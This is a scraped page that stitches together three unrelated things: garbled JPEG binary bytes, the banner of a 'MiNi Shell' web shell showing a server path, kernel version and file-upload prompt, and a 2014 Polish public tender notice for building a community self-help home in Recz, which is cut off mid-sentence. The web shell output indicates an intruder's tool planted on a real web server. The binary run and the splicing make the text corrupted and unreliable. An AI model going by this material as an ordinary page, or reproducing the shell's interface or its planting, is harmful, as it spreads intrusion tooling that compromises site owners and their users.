JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140708/148005-N-2014.html

<p class="kh_header"><b>Recz: Budowa obiektu Środowiskowego Domu Samopomocy w Reczu, przy ul. Staromiejskiej, na działce o nr ewid. 279 obręb Recz.</b><br>
<b>Numer ogłoszenia: 148005 - 2014; data zamieszczenia: 08.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Recz , ul. Ratuszowa 17, 73-210 Recz, woj. zachodniopomorskie, tel. 95 7654461 do 64, faks 95 7654461.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa obiektu Środowiskowego Domu Samopomocy w Reczu, przy ul. Staromiejskiej, na działce o nr ewid. 279 obręb Recz..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót składający się na przedmiotem zamówienia obejmuje wykonanie robót budowlanych w szczególności: 1.1. Roboty budowlane: a. Wymiana gruntu wraz z zagęszczeniem - 1823 m3, b. Fundamenty - 29,5 m3 , c. Izolacje przeciwwilgociowe181,5 m2 , d. Słup S1 - - 0,6 m3 , e. Podciągi i nadproża - 62,4 m, f. Wieńce - 5,9 m3 , g. Konstrukcja drewniana dachu wraz pokryciem - 280 m2 , h. Ściany fundamentowe - 15,2467 m3 , i. Stolarka okienna i drzwiowa zew. - 39.09 m2 , j. Drzwi wew. - 32 m2 , k. Roboty murowe - 449,0 m2 , l. Tynki - 515,7 m2 , m. Okładziny ścienne z płytek - 69,3 m2 , n. Posadzki - 185, 33 m2 , o. Wykładziny z PCV - 99,7 m2, p. Okładziny podłogowe z płytek - 86,7 m2 , q. Sufity podwieszone wraz z w-wą termiczna, - 185,33 m2 , r. Elewacja wyprawa tynkarska wraz z ociepleniem - 270 m2 , s. Wentylacja grawitacyjna, odgromowa t. przyłącze zewnętrzne wodno - kanalizacyjne , gazowe, energetyczne, u. Wewnętrzna instalacja gazowa, elektryczna, c.o., kanalizacyjna sanitarna, hydrantowa, teleinformatyczna, oświetleniowa, v. Opaska wokół budynku, w. Zagospodarowanie chodnik - dojście do budynku. 1.2. Technologia: TECHNOLOGIA ŚDS RECZ L.p. Nazwa sprzętu.wyposażenie Jedn. Ilość Cena netto Cena brutto 1. Stół kuchenny - nogi stołu w kolorze srebrnym, blat wykonany z płyty wiórowej laminowanej o grubości 18 mm, wymiary 80 cm x 140 cm, wysokość 80 cm. Kolorystyka: kolor dostosowany do mebli istniejących w pomieszczeniach wskazanych przez Zamawiającego szt. 1 2. Kuchenka z piekarnikiem elektrycznym. Kuchenka 4-palnikowa, sterowanie pokręteł z przodu, zabezpieczenie przeciwwypływowe, zapalanie w pokrętłach, kolor srebrny, piekarnik z wyświetlaczem elektronicznym, min. 10 funkcji, termoobieg, sterowanie elektroniczne, blokada przycisków, drzwi z pełnego szkła, klasa energetyczna A lub A+, pojemność piekarnika 65l, kolor srebrny, wymiary: 60x60x80 cm. szt. 1 3. Zmywarka do naczyń o szerokości 60 cm, posiadająca zewnętrzny panel sterowania. Urządzenie w klasie energetycznej A, mające do wyboru min 5 programów i 4 temperatury zmywania. Klasa efektywności suszenia: A. Zużycie wody litr.cykl: max 15.5 l. Poziom hałasu dB.: 49. Pojemność kpl.: min. 12. Zabezpieczenie przeciwwypływowe, wymiary 60x60x80 cm. szt. 1 4. Meble kuchenne stojące z blatem z wbudowana zmywarką, kuchenką z płyty meblowej, front typu MDF clasic z uchwytami metalowymi, wraz z montażem. Front do zmywarki z płyty meblowej szer. 60cm, Wysokość szafek 85 cm 2 szafki dwudrzwiowe 80 cm z 1 półką. Szafka pod zlewozmywak szer. 80 cm. Jeden słupek z 4 szufladami o szerokości 40 cm. Blat kuchenny roboczy grubość 28mm dł 340 cm z wbudowanym zlewozmywakiem kuchennym. Kolorystyka: kolor dostosowany do mebli istniejących w pomieszczeniach wskazanych przez Zamawiającego kpl. 1 5. Okap kuchenny podszafkowy. Stal nierdzewna, kolor srebrny, wydajność min 380m3.filtr przeciwtłuszczowy, oświetlenie halogenowe, sterowanie elektroniczne, wymiary 60x47 cm. szt. 1 6. Lodówka - Chłodziarka z zamrażalnikiem u dołu, sterowana elektronicznie, o całkowitej pojemności netto 338 l, w klasie energetycznej A++. Komora chłodząca o pojemności 225 l, wewnątrz szklane półki z regulacją wysokości, pojemnik na warzywa i owoce oraz balkoniki na drzwiach. Komora mrożąca - 3 szuflady. Kolor: srebrny, wysokość cm: 187.5, szerokość cm: 59.5, pojemność całkowita netto l: 338, klasa energetyczna: A++. szt. 1 7. Zlewozmywak kuchenny dwukomorowy - zabudowany w blat, 2 komory, owalny, stal nierdzewna, bez otworu na baterie, szer. 80cm. szt. 1 8. Robot kuchenny wieloczynnościowy o mocy min. 600 W, z 4 stopniową regulacją prędkości. Wyposażony w malakser o pojemności 3.9 l., mikser kielichowy o pojemności 1 l, maszynkę do mielenia mięsa, miskę do mieszania ze stali szlachetnej, końcówki mieszające i do ubijania, tarcze do tarcia i cięcia w plasterki. Posiadający zabezpieczenia przed przeciążeniem szt. 1 9. Garnek z uchwytami i pokrywką ze stali nierdzewnej o pojemności 20l. szt. 1 10. Garnek z uchwytami i pokrywką ze stali nierdzewnej 10 l. szt. 2.11Garnek ze stali nieredzew2nej 5 l-szt.1  11a. Krzesło - Metalowy stelaż krzesła w kolorze srebrnym, miska siedziska i oparcia tapicerowane gąbka i materiałem, wym. 80x53x43gł.cm. szt. 32 12. Krzesło obrotowe - Regulacja wysokości 450-600 mm. Regulacja wysokości siedziska sprężyną gazową z blokadą , kąt odchylenia oparcia pleców 20 . Przejezdna pięcioramienna podstawa wykonana z tworzywa. Tapicerowane siedzisko i oparcie pleców gąbką i materiałem. Fotel wyposażony w podłokietniki wykonane z tworzywa. szt. 3 13. Stół - Nogi stołu metalowe, blat wykonany z płyty wiórowej laminowanej o grubości 18 mm . Wymiary 80wys. cm x 80 cm x 140 cm. Kolorystyka: kolor dostosowany do mebli istniejących w pomieszczeniach wskazanych przez Zamawiającego szt. 3 14. Regał -Płyta obustronnie laminowana o klasie higieniczności E1.Korpus wzmocniony wraz z częścią cokołową - dolną. Pod każdą półką listew usztywniająca 10 cm szer., zamontowana w taki sposób, aby przeciwdziałała uginaniu się półek i wypychaniu tylnej ściany przez dokumenty. Całość dostosowana do mebli istniejących. Wymiary orientacyjne, właściwe dostosować do warunków w celu zachowania odkrytych przewodów wentylacyjnych: 80x42 wys. 180 cm, 5 szt. półek na segregatory. szt. 4 15. Szafa na ubrania kostiumy. Płyta obustronnie laminowana o klasie higieniczności E1. Wymiary: Szafa 80x60 wys. 180. Wyposażona w 1 półkę, drążek o średnicy 25mm na wieszaki. Górna część szafy okleinowana obrzeżem ABS 28 mm x 2 mm. Drzwi i korpus okleinowane obrzeżem ABS w kolorze płyt. Okucia: zamek, uchwyty dostosowane do istniejących w pomieszczeniach wskazanych przez Zamawiającego. Kolorystyka: kolor dostosowany do mebli istniejących w pomieszczeniach wskazanych przez Zamawiającego. szt. 1 16. Żelazko parowe o mocy min. 2100 W, z uderzeniem pary min. 90 g.min, wyposażone w funkcję samooczyszczania, prasowania na sucho i mokro oraz w pionie, odporną na zarysowania stopę, blokadę kapania, automatyczny wyłącznik, zbiornik na wodę o pojemności min. 300 ml. szt. 1 17. Deska do prasowania. Powierzchnia do prasowania 120cm x 38cm. Wymiary złożonej deski 153cm x 41cm x 6,5cm. Waga deski 8kg. Blat deski wykonany ze sztywnej siatki metalowej pokrytej 8mm pianką i bawełnianym pokrowcem. Gniazdo elektryczne z antenką podtrzymującą kabel żelazka oraz przewodem o długości min. 2 m. Zabezpieczenie przed przypadkowym rozłożeniem. Podstawa pod żelazko z zabezpieczeniami przed zsunięciem żelazka. szt. 1 18. Suszarka bieliźniarka stabilna i łatwa do rozkładania. Wymiary: 46 x 160 x 70 cm; ilość prętów min. 6. Konstrukcja stalowa malowana proszkowo z plastikowymi dodatkami, zabezpieczenia nóżek przed zniszczeniem zarysowaniem podłogi kółeczka przy nóżkach ułatwiająca przesuwanie suszarki, elementy plastikowe dające dodatkową ochronę ubrań. szt. 1 19. Odkurzacz workowy o mocy silnika min. 2200 W i mocy ssania 500 W, z filtrem, wskaźnikiem zapełnienia worka na kurz, elektroniczną regulacją mocy. Zasięg pracy m: 12 szt. 1 20. Suszarka do włosów o mocy 2000 W, z 2 stopniami prędkości, 3 temperatury oraz nawiewem zimnego powietrza. szt. 1 21. Sprzęt audio-video. Budowa zestawu: amplituner i odtwarzacz Blu-ray w jednej obudowie. Standardy odtwarzania obrazu AVC-HD, standardy odtwarzania dźwięku AAC. Maksymalna moc wyjściowa zestawu od 800 do 1000. Liczba cyfrowych wyjść HDMI 1. Liczba złączy USB 1. Kolor kolumn czarny. Kolor obudowy czarny. zestaw. 1 22. Telewizor LCD: przekątna obrazu 42. Złącze HDMI i USB, rozdzielczość obrazu px: 1024x768, kontrast ekranu dynamiczny: 3 000 000:1, format obrazu: 16:9. Zgodnośc HD FULL HD, technologia odświeżania 200 Hz. Kolor obudowy czarny. szt. 1 23. Szafka pod telewizor wymiary użytkowe: szer. 48,5cm, gł. 41cm, wysokość przestrzeni pomiędzy podstawą a półką 20cm, pomiędzy półką a blatem 17,5cm, wymiary użytkowe wnęk po bokach szafki: szer. 42cm, gł. 42cm. Szafka wykonana z płyty wiórowej dwustronnie melaminowanej, płyty MDF, krawędzie płyt oklejone obrzeżem ABS, w kolorze płyt. Okucia: zamek, uchwyty dostosowane do istniejących w pomieszczeniach wskazanych przez Zamawiającego. Kolorystyka: kolor dostosowany do mebli istniejących w pomieszczeniach wskazanych przez Zamawiającego. szt. 1 24. Lustro na ścianę bez ram wym. Wys.1,8 m x szerokość 2m - szt. 2 25. Pufy duże wykonane z ekoskóry, wypełnienie granulatem styropianowym, rozmiar L: szerokość siedziska - 140 cm, wysokość do siedziska - 70 cm, wypełnienie - 570 litrów. Kolory: żółty 1 szt., czerwony 1 szt., niebieski 1 szt., czarny 1 szt. szt. 4 26. Poduchy duże do siedzenia wykonane z ekoskóry, wypełnienie granulatem styropianowym, rozmiar L: wysokość: 40 cm, średnica podstawy: 120 cm, wypełnienie: 420 l. Kolory: żółty 1 szt., czerwony 1 szt., niebieski 1 szt., czarny 1 szt. szt. 4 27. Biurko. Wymiary 120x85. Wysokość 82cm. Blat o grubości 28mm wykonany z płyty obustronnie laminowanej o klasie higieniczności E1, oklejonej obrzeżem ABS o grubości 2 mm w kolorze blatu. Z lewej strony szafka dostosowana do jednostki komputerowej z przewidzianym mocowaniem przewodów, z prawej strony cztery szuflady zamykane na zamek centralny, prowadnice rolkowe - pełen wysuw. Obrzeże korpusów również okleina ABS dostosowana kolorystycznie do koloru korpusów. Biurko wyposażone w półkę do klawiatury komputerowej. Blat biurka wyposażony w przelotkę na kable w kolorze szarym lub kolorze blatu, o średnicy od 5-8 cm. Okucia: dostosowane do istniejących w pomieszczeniach wskazanych przez Zamawiającego. Kolorystyka: kolor dostosowany do mebli istniejących w pomieszczeniach wskazanych przez Zamawiającego szt. 1 28. Szafa na dokumenty. Płyta obustronnie laminowana o klasie higieniczności E1.Korpus wzmocniony wraz z częścią cokołową - dolną. Pod każdą półką listew usztywniająca 10 cm szer., zamontowana w taki sposób, aby przeciwdziałała uginaniu się półek i wypychaniu tylnej ściany przez dokumenty. Całość dostosowana do mebli istniejących. Wymiary orientacyjne, właściwe dostosować do warunków w celu zachowania odkrytych przewodów wentylacyjnych: Szafa 80x42 wys. 194 - 4 szt. Wyposażona w 5 szt. półek na segregatory. Drzwi i korpusy okleinowane obrzeżem ABS w kolorze płyt. Okucia: szafa wyposażona w zamki, uchwyty dostosowane do istniejących w pomieszczeniach wskazanych przez Zamawiającego. Kolorystyka: kolor dostosowany do mebli istniejących w pomieszczeniach wskazanych przez Zamawiającego. szt. 1 29. Zestaw komputerowy, w którego skład wchodzi: Monitor LCD nowy w kartonie z instrukcją oprogramowaniem, kablem video oraz zasilającym - rozmiar matrycy 17 cali, rozdzielczość 1440x900, kontrast 600:1, czas reakcji 8 ms, jasność 250 cd, rozmiar plamki 0.255 mm, typ matrycy antyodblaskowa, kąty widzenia 160° horizontal i 150° vertical, złącze HDMI, wbudowane głośniki Jednostka centralna - w skład zestawu wchodzi: Oprogramowanie : System operacyjny PL + pakiet biurowy PL, program antywirusowy Klawiatura , mysz, kable zasilające, UPS - wolnostojący, moc skuteczna 400 W, czas w podtrzymywaniu 100 % min 7 min. napęd optyczny: DVD.RW Cache L2 4 MB Procesor core 3 GHz HDD: 500GB SATA, 7200 obr.min RAM: 4GB DDR 3 Zewnętrzna karta graficzna z wyjściem HDMI Czytnik kart pamięci tak USB 2.0; 1 wejście audio; 1 wyjście audio; 1 center.sub; 1 wyjście cyfrowe; 1 DVI-D; 1 wejście mikrofonu; Złącze sieciowe RJ-45; 1 port wideo VGA zestaw 1 30. Telefon.fax Faks na papier zwykły z modemem o szybkości transmisji 9600 bps, funkcją głośnomówiącą, wyposażony w książkę telefoniczną pozwalającą na zapamiętanie do 100 pozycji oraz podajnik na 20 stron, funkcja kopiowania z możliwością skalowania, elektroniczną regulację głośności oraz tryb korekcji błędów ECM. Telefon z funkcją głośnomówiącą , wyświetlaczem, automatyczną sekretarką, książką telefoniczną. szt. 1 31. Urządzenie wielofunkcyjne drukarka, skaner, kopiarka - Kolorowe laserowe sieciowe urządzenie wielofunkcyjne. Funkcje standardowe: kopiowanie, drukowanie, skanowanie do poczty e-mail.folderu. Funkcje opcjonalnie: skanowanie sieciowe, skanowanie do drukowanie z USB. Prędkość kopiowania : kolor : min 20 str.min, czerń : min 20 str.min, Rozmiar papieru: A4 do A3, Pojemność pojemników na papier : min. 500 arkuszy. Automatyczny podajnik papieru do druku dwustronnego na min. 100 arkuszy szt. 1 32. Pojemnik na papier toaletowy - wykonany z tworzywa ABS, wymiary roli: 190 mm - 230 mm. Kolor obudowy: biały. Wymiary: - wysokość: 267 mm, - szerokość: 258 mm, - głębokość: 117 mm. Zamek i klucz: plastik. Okienko kontrolne informujące o ilości papieru. Rodzaj montażu: naścienny, przykręcany. Opakowanie musi zawierać zestaw wkrętów z kołkami szt. 4 33. Dozowniki mydła w płynie - Pojemność: 1 litr. Materiał obudowy: tworzywo ABS, kolor biały. Wymiary: - wysokość: 275mm, - szerokość: 100 mm, - głębokość: 112 mm. Sposób uruchamiania: przycisk. Wizjer do kontroli poziomu mydła. Montaż naścienny, przykręcany. Opakowanie musi zawierać zestaw wkrętów z kołkami szt. 5 34. Dozowniki ręczników jednorazowych. Przeznaczony na ręczniki papierowe w listkach ZZ. Materiał obudowy: tworzywo ABS, kolor biały. Wymiary: - wysokość: 259 mm, - szerokość: 305 mm, - głębokość: 132 mm. Sposób dozowania: wyciągnięcie jednej sztuki papieru powoduje wysunięcie się kolejnej. Zamek i klucz: plastik. Okienko kontrolne informujące o ilości ręczników. Montaż naścienny, przykręcany. Opakowanie musi zawierać zestaw wkrętów z kołkami. szt. 5 35. Pralka automatyczna. Pralka ładowana od przodu, o głębokości min.56 cm, Wysokość do 85 cm, szerokość do 60cm pojemności min. 5,5 kg, z programami do prania wełny, bawełny, tkanin delikatnych, sterowana elektronicznie, o prędkości wirowania 1000 obr.min., w klasie energetycznej A+. szt. 1 36. Szafka łazienkowa - korpus płyta wiórowa zwykła 16mm w melaminie, fronty płyta wiórowa wilgocioodporna 16mm lakierowana w białym połysku z zewnątrz, Wysokość: 81 cm, Szerokość: 47,2 cm, Głębokość: 30,2 cm, dwudrzwiowa. szt. 1 37. Szafka na środki czystości i środki higieniczne - korpus płyta wiórowa zwykła 16mm w melaminie, fronty płyta wiórowa wilgocioodporna 16mm lakierowana w białym połysku z zewnątrz, Wysokość: 180 cm, Szerokość: 60 cm, Głębokość: 30,2 cm, dwudrzwiowa. szt. 1.Instalacja teletechniczna

Na obiekcie projektuje się instalacje gniazd komputerowych (internetowych) oraz telefonicznych. Projektuje się, aby docelowo punktem centralnym ww. instalacji była szafa dystrybucyjna SD. Szafę SD zlokalizować w wiatrołapie budynku. Typ i wyposażenie (urządzenia aktywne oraz pasywne) dobrać wg potrzeb oraz uzgodnień z dostawcą sygnału.
	W wybranych pomieszczeniach (pom. rehabilitacji oraz gabinecie psychologa) projektuje się wykonać punkty logiczne PEL. Punkty w wykonaniu naściennym, bądź podtynkowym (w gestii Inwestora). W każdym PEL zainstalować 1 gniazdo RJ45 kat. 6 (do Internetu) oraz 1 gniazdo RJ45 
kat. 6 (do telefonu).
	Do pomieszczenia rehabilitacji 00.09 doprowadzić z SD: 2 przewody UTP kat. 6 o długości l=18m każdy.
Do pomieszczenia rehabilitacji 00.10 doprowadzić z SD: 2 przewody UTP kat. 6 o długości l=21m każdy.
Do pomieszczenia rehabilitacji 00.12 doprowadzić z SD: 2 przewody UTP kat. 6 o długości l=21m każdy.
Instalację komputerową, jak i telefoniczną wykonać przewodem UTP kat. 6 oraz zakończyć gniazdem RJ-45. Przewody układać pod tynkiem w rurach osłonowych. 
Sygnał do szafy SD - wg gestora usług telekomunikacyjnych po uzyskaniu właściwych warunków przyłączenia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zakres robót dodatkowych i uzupełniających może obejmować roboty i ich zakres  niemożliwy do przewidzenia na etapie opracowania projektu budowlanego, określenia 
zakresu rzeczowego, przedmiaru robót i kosztorysu, tj.  robót odkrytych podczas robót 
odkrywkowych  robót ziemnych związanych z wymianą gruntu oraz podczas wykonywania przyłączy infrastruktury technicznej - nieprzewidzianych robót  ukrytych w ziemi, np. wysoki poziom wód gruntowych, nieprzewidziane przeszkody ukryte w ziemi  oraz  innych robót niezawinionych ze strony zamawiającego i wykonawcy, a  warunkujących wykonanie przedmiotu zamówienia zgodnie z zasadą sztuki budowlanej i PN.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.52.10-2, 45.11.12.00-0, 45.11.12.40-2, 45.11.12.94-4, 45.23.60.00-0, 45.26.12.10-9, 45.26.23.00-4, 45.26.25.00-6, 45.26.26.20-3, 45.26.26.50-2, 45.31.00.00-3, 45.31.23.10-3, 45.32.10.00-3, 45.32.40.00-4, 45.33.00.00-9, 45.33.11.00-7, 45.33.11.10-0, 45.33.12.00-8, 45.40.00.00-1, 45.41.00.00-4, 45.42.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 15 000,00 zł (słownie złotych: piętnaście tysięcy złotych). 2. Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.: 1) pieniądzu, 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 3) gwarancjach bankowych, 4) gwarancjach ubezpieczeniowych, 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr z 2007, Nr 42, poz. 275). 3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. 4. Wadium w pieniądzu należy wnieść przelewem na konto: Gospodarczy Bank Spółdzielczy w Choszcznie o/Recz Nr 60 8359 0005 0000 1108 9000 0032 z adnotacją - wpłata wadium w postępowaniu o udzielenie zamówienia pn. Budowa obiektu Środowiskowego Domu Samopomocy w Reczu, przy ul. Staromiejskiej, na działce o nr ewid. 279 obręb Recz 5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku podmiotu, któremu powierzono przeprowadzenie postępowania. 6. W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego - w kasie Urzędu Miejskiego pok. Nr 14 (okienko kasy) lub dołączyć do oferty. 7. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt. 4 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Dysponują lub będą dysponować kadrą techniczną z uprawnieniami budowlanym do kierowania robotami budowlanymi w zakresie: - o specjalności branży budowlanej konstrukcyjnej - kierownik budowy, - o specjalności branży elektrycznej - kierownik robót, - o specjalności branży elektrycznej- kierownik robót. Wykonawca składa stosowne oświadczenie o spełnieniu warunków wynikających z art. 22 ust. 1 Pzp ( zał. Nr 4 i nr 7 do SIWZ). Zamawiający uzna za spełnienie warunku złożenie oświadczenia przez Wykonawcę wraz z informacją o podstawie do dysponowania tymi osobami. Najpóźniej w dniu podpisania umowy, wybrany wykonawca jest zobowiązany wskazać osoby, które w jego imieniu będą pełniły obowiązki : - kierownika budowy posiadającego uprawnienia budowlane o specjalności konstrukcyjnej oraz - kierownika robót posiadającego wymagane uprawnienia budowlane w zakresie elektrycznym, - kierownika robót posiadającego wymagane uprawnienia budowlane w zakresie sanitarnej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Wykazu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, iż roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - Zał. Nr 6 Wykonawca udokumentuje należyte wykonanie, co najmniej dwóch robót budowlanych polegających na budowie lub przebudowie obiektów kubaturowych, o wartości brutto nie mniejszej niż 600 000 PLN każda robota budowlana. Dowodem dotyczącym najważniejszych robót jest poświadczenie lub w przypadku zamówień na roboty budowlane, inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia. W przypadku gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane, wskazane w wykazie zostały wcześniej 